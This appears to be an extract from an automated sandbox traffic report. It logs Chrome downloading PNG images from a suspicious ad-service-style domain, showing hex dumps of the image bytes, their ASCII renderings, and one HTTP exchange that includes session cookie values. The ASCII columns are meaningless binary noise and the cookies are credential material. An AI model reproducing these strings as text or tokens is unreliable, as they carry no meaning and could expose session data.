                                                                                                                                      2024-05-08 18:12:54 UTC715INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                                                                                                      Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f cb 47 bf 7a 89 db 37 ae e1 c6 95 0b 48 fc 98 90 a5 65 e6 e6 79 e0 e8 52 18 4e 2e ae 28 5c a4 28 0a
                                                                                                                                      Data Ascii: bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jlGz7HeyRN.(\(
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e 1a 30 00 43 06 0f 56 0b 53 46 f4 a2 0a 0f 66 8c 1a 08 30 a2 57 03 34 23 68 a2 d6 80 6a 04 b8 64 6b
                                                                                                                                      Data Ascii: [-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~0CVSFf0W4#hjdk
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0 88 5e f7 98 8b ad 47 b5 06 54 b1 81 90 9d 3d b2 b9 e7 2b 57 a9 82 35 ab 57 f3 82 97 ec 6c be a4 57
                                                                                                                                      Data Ascii: 1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#^GT=+W5WlW
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c 78 90 37 7c d6 ac 5b c7 cd 9e 39 93 ca 2e 5f b1 0a da 86 48 ce 42 27 e5 f2 b9 93 38 76 40 92 4d ad
                                                                                                                                      Data Ascii: JS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x7|[9._HB'8v@M
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8 a1 c3 86 71 c7 8e 1e a5 fd 8e 18 39 12 bd 7a f4 d0 0a 26 2d 5b b6 e4 22 23 25 47 b6 e6 b1 b0
                                                                                                                                      Data Ascii: ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`Fq9z&-["#%G
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5 6b da 6f df 61 a3 51 b8 88 3b e2 3f bc a7 b7 e9 9f 44 de 47 61 b7 a2 68 d5
                                                                                                                                      Data Ascii: xp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.koaQ;?DGah
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b d9 c7 a3 5e e1 e7 f3 e7 91 90 fc 7d 07 88 be c6 17 6d f6 cb 88 5e 9b e8 1a
                                                                                                                                      Data Ascii: jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![^}m^
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02 15 e7 e7 57 0b cb 97 2f 13 ad ad 9a 62 f6 29 29 96 33 e1 92 80 6f e4 f6 7e
                                                                                                                                      Data Ascii: L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4aW/b))3o~
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e 64 7c 02 3a 1e 3d 86 77 59 3c be d3 96 ae ba 94 cb 88 5e 97 68 8b b3 2f c1
                                                                                                                                      Data Ascii: FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7Nd|:=wY<^h/


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      67192.168.2.1649789104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:53 UTC1155OUTGET /ijFTkgLR5Efre1T29FYi4mZsJ0xy5FLOyx1t1pBM6XxEeSqEaWM6gGZRb12210 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:54 UTC666INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:54 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 49602
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="ijFTkgLR5Efre1T29FYi4mZsJ0xy5FLOyx1t1pBM6XxEeSqEaWM6gGZRb12210"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1tmv%2FHSHMIG05rC8sS%2F4bLlUIOrG6VtbLM14fpmh7Wrs7DCR5W9Sl05ezea%2BulKUcZt%2BnBGjM9i2V%2BbP5MtZMwump%2FWahB9gEjoKIw1%2FMFnpCkeP4qyYj%2BUFlSeQYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6bab4b5ac4e9-SEA
                                                                                                                                      2024-05-08 18:12:54 UTC703INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                                                                                                      Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 70 2d 70 3d 6e b9 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24
                                                                                                                                      Data Ascii: p-p=n"I$I$I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 92 24 49 92 a0 fa 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70
                                                                                                                                      Data Ascii: $IgPD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: c3 a2 12 1b 01 5c 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22
                                                                                                                                      Data Ascii: \@9zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 76 a2 cf bb a8 9a 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74
                                                                                                                                      Data Ascii: v(Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&t
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 10 f1 f7 e2 5c 75 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37
                                                                                                                                      Data Ascii: \uF3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 59 c0 0a c1 59 24 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8 fa 46 b5
                                                                                                                                      Data Ascii: YY$I$I%_OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+pF
